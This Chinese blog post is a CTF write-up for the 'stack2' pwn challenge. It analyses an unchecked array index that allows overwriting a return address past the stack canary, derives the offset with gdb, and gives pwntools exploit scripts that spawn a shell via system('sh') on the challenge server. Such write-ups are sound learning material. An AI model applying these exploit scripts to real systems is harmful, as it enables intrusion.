攻防世界高手进阶区——stack2

已于 2022-02-25 15:28:30 修改
阅读量893 收藏 4
点赞数 2
分类专栏: XCTF 文章标签: pwn 反汇编 linux kali linux
于 2022-02-24 21:52:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62675330/article/details/123121669
版权

攻防世界高手进阶区——stack2

在这里插入图片描述

看题目啥都没有

一,分析文件

  1. checksec
    在这里插入图片描述

    发现居然存在栈溢出保护,这是以前做题没看到过的,可能会有新的知识点。

  2. 运行文件
    在这里插入图片描述

    貌似是一个输入数字计算平均值的程序。

  3. ida打开

      unsigned int m; // [esp+34h] [ebp-74h]
  char v13[100]; // [esp+38h] [ebp-70h]
  unsigned int v14; // [esp+9Ch] [ebp-Ch]

  v14 = __readgsdword(0x14u);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  v9 = 0;
  puts("***********************************************************");
  puts("*                      An easy calc                       *");
  puts("*Give me your numbers and I will return to you an average *");
  puts("*(0 <= x < 256)                                           *");
  puts("***********************************************************");
  puts("How many numbers you have:");           // 有几个数字
  scanf("%d", &v5);
  puts("Give me your numbers");                 // 输入一个数字
  for ( i = 0; i < v5 && (int)i <= 99; ++i )
  {
    scanf("%d", &v7);
    v13[i] = v7;
  }
  for ( j = v5; ; printf("average is %.2lf\n", (double)((long double)v9 / (double)j)) )
  {
    while ( 1 )
    {
      while ( 1 )
      {
        while ( 1 )
        {
          puts("1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit");// 选择
          scanf("%d", &v6);                     // 输入选择
          if ( v6 != 2 )
            break;
          puts("Give me your number");          // 加数字
          scanf("%d", &v7);
          if ( j <= 99 )
          {
            v3 = j++;
            v13[v3] = v7;
          }
        }
        if ( v6 > 2 )
          break;
        if ( v6 != 1 )
          return 0;
        puts("id\t\tnumber");
        for ( k = 0; k < j; ++k )
          printf("%d\t\t%d\n", k, v13[k]);
      }
      if ( v6 != 3 )
        break;
      puts("which number to change:");          // 修改数字,存在漏洞!!!没有检查索引值的值,没有检查数组边界,可以输入返回地址的相对于数组首地址的偏移
      scanf("%d", &v5);
      puts("new number:");                      // 返回地址修改为system函数地址,和bash地址
      scanf("%d", &v7);
      v13[v5] = v7;
    }
    if ( v6 != 4 )
      break;
    v9 = 0;
    for ( m = 0; m < j; ++m )
      v9 += v13[m];
  }
  return 0;
}

    这里分析了一下文件,刚开始啥都没看出来,后来是看了网上的其他大佬的wp才知道这个漏洞(未检查数组边界,造成任意地址修改,这就是绕过栈溢出保护的方法吗?)

二,解题思路

在这里插入图片描述

  • 解题的关键就是这里,这里未检查数组的索引值,可以让我们修改任意地址的内容。我们可以直接修改函数返回地址的内容。

  • 现在就只需要找到相对于该数组函数返回地址的偏移就可以了。

    这里我觉得是最难的一步,看了好几个wp才明白了这是怎么回事。

  • 这里按照以往的惯例去ida直接找返回地址相对于数组的偏移算出来是有问题的。

在这里插入图片描述

在这里插入图片描述

这里面我算出来的偏移量为0x74,但是根据其他大佬通过动态调试算出来的偏移,这里的偏移应该是0x84。

这是怎么回事呢?

0x84要经过自己去动态调试

过程如下:

  • 分析汇编代码

在这里插入图片描述

这段汇编代码其实就是对应下面这段C语言代码

在这里插入图片描述

这里也可以进一步看出来汇编的复杂。

分析一下汇编代码,这里面通过scanf将获取的值放入栈区,再将该数放入eax寄存器中,再将eax的值放入ecx寄存器,再取一个栈区的地址给edx,将一个值给eax(分析上面的汇编可以知道,这里放入eax的值就是数组的索引值),再将地址加给eax寄存器,最后将cl(ecx寄存器的低八位)的值赋给eax指向的地址。

通过这里的分析可以知道这时候eax里面存的地址便是数组起始地址。

在这里插入图片描述

通过这里的main endp可以知道这是main函数的结束地方,就可以得出,这里的retn时esp指向的地址便是返回地址。
在这里插入图片描述

在main函数和输入数组和返回retn指令的地方下断点。

在这里插入图片描述

输入全填一

在这里插入图片描述

run一下,指令执行前这里是0xd0,

在这里插入图片描述

指令执行后,这里是0x1,所以这里的oxffffd378就是数组起始地址,这里的0xf7ffd901什么都不代表,只是刚好数组起始地址里面存的是这个地址罢了。我就是在这里疑惑了半天,都是因为gdb不太熟练呀。菜鸡一枚。

在这里插入图片描述

运行到ret,esp里面存的就是返回地址。

所以偏移量是0xffffd3fc - oxffffd378 = 0x84

至于这里面为什么不是ida得到的数,是因为最后leave 和lea指令调整了栈帧,将栈底恢复到了之前的位置。栈底就变化了,偏移量自然就变化了

偏移量在这里就能得到了。

  • 而且程序中存在后门函数hackhere

在这里插入图片描述

通过后门函数可以直接获得shell。

三,exp

from pwn import *
 
process_name = './stack2'
p = process('./stack2')
 
 
hackhere = [0x9b, 0x85, 0x04, 0x08]  #0x0804859B
write_offset = 0x84
 
def change_number(offset, value):
        p.sendlineafter('5. exit', '3')
        p.sendlineafter('which number to change:', str(offset))
        p.sendlineafter('new number:', str(value))
 
p.sendlineafter('How many numbers you have:', '1')
p.sendlineafter('Give me your numbers', '1')
for i in range(4):
        change_number(write_offset+i, hackhere[i])
 
p.sendlineafter('5. exit', '5')
 
 
p.interactive()

拿着这个exp去本地运行,发现能够运行成功,但是运行在服务器就出现了问题。

在这里插入图片描述

报错,发现服务器没有bash终端,只有sh。(后来才知道原来这里本来是出题人的失误,发现也能做出来就没有改。)

  • 于是我们得改变思路,发现程序有system函数,也可以找到sh字符串。
  • 就可以通过sh和system来构造exp
from pwn import *
 
process_name = './stack2'
p = process('./stack2')
p = remote('111.200.241.244',60740)
 
 
hackhere = [0x9b, 0x85, 0x04, 0x08]  #0x0804859B
write_offset = 0x84
system_addr = [0x50, 0x84, 0x04, 0x08] # 0x08048450
sh_addr = [0x87, 0x99, 0x04, 0x08]  # 0x08048987
 
def change_number(offset, value):
        p.sendlineafter('5. exit', '3')
        p.sendlineafter('which number to change:', str(offset))
        p.sendlineafter('new number:', str(value))
 
p.sendlineafter('How many numbers you have:', '1')
p.sendlineafter('Give me your numbers', '1')
for i in range(4):
        change_number(write_offset+i, system_addr[i])
 
write_offset += 8
for i in range(4):
        change_number(write_offset+i, sh_addr[i])
 
 
p.sendlineafter('5. exit', '5')
 
 
p.interactive()

这样就可以通过服务器了。

四,收获

  • 学会了一个新的漏洞(绕过栈溢出保护)。
  • 对python的编程了解了更多。
  • 学会了gdb的使用。
  • 学会了基础汇编语言。

总的来说,这次做题收获还是很大的。虽然难了我好几天。但是收获慢慢就不亏。哈哈哈

coke_pwn
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C#探秘系列(三)——StackTrace,Trim
09-04
个系列我们看看C#中有哪些我们知道,但是又不知道怎么用,又或者懒得去了解的东西,比如这篇我们要介绍的StackTrace,Trim
攻防世界pwn——stack2
qq_62076255的博客
12-18 564
攻防世界pwn——stack2做题记录
攻防世界 stack2
10-07 481
1.题目 2.IDA分析 3.分析 本地存在明显的数组越界漏洞,选择3修改数据时,没有检查是否越界,直接操作指针进行修改。所以我们只要利用这个漏洞构造system的调用即可(注意,function的hackhere方法不可用,调用会提示不存在bash。。。) 所以这道题目最难在于addr_buf与addr_ret之间的距离。一开始看ida的栈信息,以为是74h,结果溢出失败。 这种情况很明显是编译器做了什么处理,所以只能动态调试。 在show data方法里面下断点,位置:0x80
攻防世界PWN进阶stack2)
BurYiA的博客
01-26 867
stack2 哈,我又回来了 这个题呢,基本rop,但有几个点比较难弄… 比如:偏移不好求,环境中没有/bin/bash等… 言归正传,我们先看一下基本信息 32位程序,有NX,有Canary。 运行可以发现它可以创建一个存储数字的数组,创建好以后我们可以对其中的数据进行一些基本的操作,ok,接下来开始硬刚IDA 通过观察main函数伪代码我们可以发现上图这个位置有点小问题 这个时对数据进行...
攻防世界pwn题--stack2
L0g1c的博客
10-31 477
查看保护机制 (有栈不可执行NX,有canary保护) 用IDA分析(查看伪代码) int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax unsigned int v5; // [esp+18h] [ebp-90h] unsigned int v6; // [esp+1Ch] [ebp-8Ch] int v7; // [esp+20h] [ebp-88h] unsigned
Stack2 攻防世界题目分析
shanwei274的博客
04-18 1014
—XCTF 4th-QCTF-2018 前言,怎么说呢,这题目还是把我折磨的可以的,我一开始是没有看到后面的直接狙击的,只能说呢。 我的不经意间的粗心,破坏了你许多的温柔 1.气的我直接检查保护: 32位程序,开启了canary保护。 2.ida查看: 首先放的第一幅图片呢,是我一开始以为可以溢出的,也可以看见我旁边标注了一个maybeoverflow。 但是是不可以的,因为首先由于这里的 i 最大上限100,可能有的人头铁就要说了,这里v7可以慢慢溢出去修改i,(和我一样) 可是这里v13的存储位
Apress - Pro MERN Stack, 2nd.2019.epub
06-07
Apress - Pro MERN Stack, 2nd.2019.epub Apress - Pro MERN Stack, 2nd.2019.epub
day14-ElasticStack学习之Elasticsearch进阶.zip
01-29
黑马程序员-JavaEE 57期-day14-ElasticStack学习之Elasticsearch进阶代码、讲义和资料
stack-2&3_栈_数据结构_后缀表达式_Stack2_stack2_
10-03
利用栈结构完成后缀表达式求值及中缀表达式求值。
攻防世界 PWN 高手进阶 stack2 (write up)
qq_44768749的博客
08-18 410
攻防世界 PWN 高手进阶 stack2 (write up)stack20x01 查看保护机制0x02 查看反汇编0x03 利用过程修改返回地为system地址设置system函数的参数为'sh'exp stack2 该题利用未对数组边界进行检查,从而可以实现栈溢出 0x01 查看保护机制 32位 开启NX和canary 无PIE 0x02 查看反汇编 int __cdecl main(int argc, const char **argv, const char **envp) { int
攻防世界-stack2-Writeup
SkYe's Blog
05-13 493
stack2 题目来源: XCTF 4th-QCTF-2018 [collapse title=“展开查看详情” status=“false”] 考点:数字下标溢出 保护情况: Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) 漏洞函数: puts("which numb
攻防世界pwn-stack2学习记录
Hotspurs的博客
11-18 1335
pwn新手一枚,做这题时苦苦没找出来题解上说的0x84偏移,经过多次尝试,终于找到了正确的方式,遂以记录。 首先分析漏洞点: 当选择3.change number时,程序没有对输入的v5进行检测,遂可以产生溢出 之后看到程序给了getflag 开启动态调试,此时在v13[v5] = v7;处下断点。 如图所示输入 转到汇编指令,查看这个地址(edx存的就是输入9,看看他把9...
攻防世界stack2逻辑漏洞题
csdn546229768的博客
11-16 3664
到了进阶题目越来越好玩了,发现解出来一道题有解数学那味了 嗯,拿到题目一看逻辑题,做题刚打完比赛(第一次)被逆向和pwn的逻辑题给整怕了,这次遇到这种题目,我选择硬刚! 首先读懂题目的内在逻辑,并关注常见的pwn漏洞,首先一步步分析 这里有个循环100次接收输入,全局的看了下都是在对buf操作,先标志一手,但是这里无法产生溢出,那么看下面 首先看到for里面初始化j = v5 ,那么这个j也就是我们可控的标记一下,然后就是死循环,每次循环后调用一次printf select1就是显示所有值、select
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3400
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
3.stack2
weixin_44864859的博客
07-27 385
这是一道数组越界的题目。数组存放在栈上,程序中给出有修改数组中数据的功能,但是没有限制范围,使得其可以修改栈上任意地址。 所以我只需要将main函数的返回地址修改成后门函数就可以了。 接下来就是确定偏移,这里把我卡住了。最一开始的想法是直接用返回地址减去输入地址,得到的偏移是0x9c,带入测试发现不行。看到这里有人肯定都要嘲笑我了,我真的是太蠢了,而且还觉得没什么问题捣鼓了半天,太菜了。。。 言归正传,要定偏移,首先我们需要搞清楚程序中修改数组数据的部分具体是怎么执行的。 这里可以看到程序具体要修改的
高手进阶(3)
weixin_44728238的博客
07-23 2035
高手进阶(2) 题目5:说我作弊需要证据 题目来源: ISCC-2017 题目描述:X老师怀疑一些调皮的学生在一次自动化计算机测试中作弊,他使用抓包工具捕获到了Alice和Bob的通信流量。狡猾的Alice和Bob同学好像使用某些加密方式隐藏通信内容,使得X老师无法破解它,也许你有办法帮助X老师。X老师知道Alice的RSA密钥为(n, e) = (0x53a121a11e36d7a84dde3...
stack2(xctf)
weixin_43868725的博客
05-26 703
0x0 程序保护和流程 保护: 流程: 当选择change number时没有对数组边界进行检查所以可以任意地址写。又在函数列表中发现一个hackhere() 0x1 利用过程 我们只需要通过数组写入这个函数的地址到main函数的返回地址处即可。简单计算一下。 v13这个数组首地址距离返回地址0x70+0x4,发现不行。然后用ida远程调试一下。输入了五个数字分别是1,2,3,4,5。offset=0xFFBDC56C-0xFFBDC4E8=0x84。 远程发现没有bash。 换成system(
攻防世界pwn高手stack2 lea调整栈帧导致偏移错误
Gtooler的博客
10-14 1715
Stack2 这题废话很多,说白了就一个数组越界的漏洞可以利用,没有对下标v5做限定,所以可以利用数组越界,直接越过canary,利用留下的后门getshell 刚开始看ida以为位移是0x74所以exp如下 from pwn import * p = remote('111.200.241.244', '50928') # p = process("./stack2") # context.log_level = 'debug' hackhere = [0x9b, 0x85, 0x04, 0x08
xctf攻防世界 MISC高手进阶 Erik-Baleog-and-Olaf(两种思路)
路baby的博客
06-24 2697
xctf攻防世界 MISC高手进阶 Erik-Baleog-and-Olaf 两种方法 方法一 直接拼二维码 方法二 用脚本
WAServiceMainContext.js:2 RangeError: Maximum call stack size exceeded
最新发布
12-06
这会导致调用堆栈溢出,从而导致“Maximum call stack size exceeded”错误。 解决这个问题的方法是检查代码中的递归调用,并确保它们都有停止条件。如果递归调用没有停止条件,它们将永远不会停止,直到调用堆栈...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值